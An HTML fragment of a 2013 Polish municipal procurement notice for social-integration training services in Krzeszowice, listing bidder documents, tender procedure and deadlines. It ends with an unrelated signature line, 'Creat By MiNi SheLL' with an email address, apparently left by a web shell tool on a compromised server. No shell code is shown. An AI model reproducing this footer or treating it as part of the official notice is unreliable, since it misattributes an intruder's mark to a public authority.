<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca złoży planowany program zajęć, opracowany dla każdej grupy oddzielnie, zawierający co najmniej;cele zajęć,zakres tematyczny zajęć,liczbę godzin przeznaczonych na poszczególne zagadnienia, opis proponowanych zajęć dla poszczególnych cyklów zajęć, materiały. Wpis do rejestru instytucji szkoleniowych prowadzony przez właściwy miejscowo Wojewódzki Urząd Pracy oraz wpis do rejestru agencji zatrudnienia.  Wykonawca zobowiązany jest do przedłożenia potwierdzenia wynajmu ośrodka szkoleniowego  wraz z podanie adresu  i szczegółowym opisem stopnia dostosowania obiektu/ów  do potrzeb dydaktycznych sali szkoleniowej  i innych pomieszczeń, które będą wykorzystywane  na potrzeby wykonania usługi</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiana umowy może być dokonana w granicach wyznaczonych przepisami ustaw Pzp, w tym art.144 ustawy Pzp, wyłącznie za zgodą obu stron, w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wrotamalopolski.pl/root_BIP/BIP_w_Małopolsce/gminy/root_Krzeszowice/Wprowadzenie<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Krzeszowicach, 32-065 Krzeszowice, ul. Kościuszki 43 pok. Nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2013 godzina 08:30, miejsce: Gminny Ośrodek Pomocy Społecznej w Krzeszowicach, 32-065 Krzeszowice, ul. Kościuszki 43 pok. Nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Unii Europejskiej w ramach Programu Europejskiego Kapitał Ludzki, priorytet VII Promocja Integracji Społecznej, działanie 7.1 Rozwój i upowszechnianie aktywnej integracji Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji  przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com